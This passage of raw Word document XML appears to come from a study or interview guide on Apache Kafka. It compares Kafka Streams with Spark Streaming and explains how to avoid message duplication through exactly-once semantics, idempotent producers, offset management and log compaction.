        <w:t>checkpoint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tributed recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. However, the overhead of checkpointing and reloading large amounts of state can increase latency and complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DFD76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E573FD8" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to seamless integration with Kafka’s replication and consumer offset mechanisms, with no additional configuration needed compared to Spark’s checkpointing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64390880"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B3306">
          <v:rect id="_x0000_i3466" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B07F7D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State Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB7E57"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2EAD966" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Kafka Streams supports </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateful operations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like aggregations, joins, and windowing with built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>state stores</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. These stores are backed by </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka itself</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ensuring that state is fault-tolerant and scalable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A2F96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465B48" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Spark Streaming also supports stateful operations, but the state management is done via </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spark’s distributed mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., RDDs). This can introduce more overhead when managing state across a distributed environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4728867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78BC3F20" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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mpler and more efficient state management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> since Kafka Streams leverages Kafka’s internal storage, reducing complexity in state handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CEA70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16092">
          <v:rect id="_x0000_i3467" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEADA3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ase of Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC2309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7ACE1A8A" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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in the Application</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>library</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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2480850" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming requires a full-fledged </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spark cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run, and setting up a Spark cluster can be complex, especially when dealing with cloud environments or managing cluster resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5073D7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07212B0C" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as it requires minimal infrastructure, running directly inside your application with fewer moving parts compared to Spark Streaming’s cluster-based setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7D114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D29064">
          <v:rect id="_x0000_i3468" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C80D3"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Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB6E2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4C235114"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al-time event-driven architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where you need to process, filter, aggregate, or transform data directly from Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EA4FA0"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Low-latency applications</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like real-time monitoring, fraud detection, or recommendation engines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD5B0F"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ghtweight, simple, and scalable applications</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that need to process Kafka data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569B0F3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A292E2"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rge-scale, distributed processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where complex stream processing or integration with batch processing is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9B7E7"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ig data analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where large amounts of stream data need to be processed and combined with batch data (e.g., combining historical data with real-time data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5940DD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88052C0" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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al for real-time, event-driven applications</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with lower operational complexity and higher throughput when Kafka is already in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF35223"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A0D84">
          <v:rect id="_x0000_i3469" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA2E00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357877A8"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is an ideal solution for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time, low-latency, event-driven stream processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the Kafka ecosystem. It offers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699334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integration with Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F41F17B"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latency and simpler deployment without requiring a separate cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9CC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uilt-in fault tolerance through Kafka's replication and offset tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517717A5"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more suitable for use cases that require </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large-scale, complex processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the ability to </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>combine batch and stream processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. However, it requires a Spark cluster, comes with more latency due to micro-batching, and involves more complexity in deployment and management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D302DC"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us,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excels in scenarios where </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time processing with low latency</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Kafka-centric architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are needed, whereas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better suited for large-scale, complex stream analytics across distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182D3D9B" w14:textId="24E3334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470" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA11F8E" w14:textId="3D94338E"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63" w:name="_Toc197868077"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you handle message duplication in Kafka</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="863"/>
    </w:p>
    <w:p w14:paraId="74E82508" w14:textId="30351D43"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Exactly Once Semantics (EOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DA7DE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has built-in support for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exactly Once Semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which ensures that messages are neither lost nor processed more than once. This is the most robust approach to handle message duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231DA20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2DC969E"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Producers can be configured to guarantee </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly once delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the acks=all and transactional.id properties. This ensures that the producer sends messages in a way that they are only written once to Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B0337"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xml:space="preserve">: Kafka consumers can commit offsets in a way that ensures messages are consumed exactly once. By enabling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on both the producer and the consumer sides, Kafka guarantees no message duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27072A5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58EF87B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78368850"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e producer waits for acknowledgement from all in-sync replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F186989"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for exactly-once delivery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46958C01"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prevents duplicate messages due to retries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7228D70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23CE317D"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manual offset management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384D4B52"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Kafka’s offset management system</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to track the exact position of consumption and avoid consuming the same message multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F6A8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mpotent Producer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B55E94"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s can be configured as </w:t>
      </w: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duplicate messages from being written to the Kafka topic, even in the case of retries due to network issues or broker failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA48C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5C7D609" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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a retry), it will be written only once to the topic. Kafka uses a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer ID (PID)</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quence numbers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each message to track message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6AF0F5"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77AAD119" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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enable.idempotence=true: This guarantees that the producer will not send duplicate messages even if network retries occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F24B41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6E1D30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essage duplication can occur if a consumer reprocesses messages that it has already processed. To avoid this, you can manage offsets manually or by using Kafka's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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E69BC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to prevent duplication using offsets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F27FF3"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By disabling auto-commit (enable.auto.commit=false) and manually committing offsets only after the consumer has successfully processed the message, you can ensure that no messages are reprocessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47236DB6"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Outside Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In some cases, consumers might want to store offsets in an external system (e.g., a database) to track the exact point where they left off, providing more control and flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534B03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Deduplication at Consumer Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41580FCF"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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly once semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or idempotent producers are not sufficient or feasible in your use case, you can implement deduplication at the consumer level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6341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7CC298A9" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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mon techniques for deduplication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC887EB"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message IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Deduplicate based on a unique message identifier (e.g., a combination of a Kafka key or a custom-generated message ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471315D7"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ime-based windowing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Maintain a window of recently processed messages for a short period to check against duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4239C048"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Log Compaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C92689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vides a feature called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that helps with deduplication, especially for use cases where the latest value for a key is important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C2576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5A08E6B"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Log compaction is useful for maintaining a compact version of the data where duplicate messages are not a problem, and only the latest state is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6D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901BD5F" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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the topic configuration cleanup.policy=compact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CAC5A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Duplicate Message Detection using Kafka Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380D26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ome cases, you may want to handle message duplication within a stream processing application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6B8AFB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DD9B065"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reams provides built-in functionality for </w:t>
      </w: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where you can store previously processed message keys in a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>state store</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and check for duplicates as you process each message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350E08B"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ing Kafka Streams' </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>window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ggregations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can implement deduplication logic as part of the stream processing pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C303C5"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37ABB">
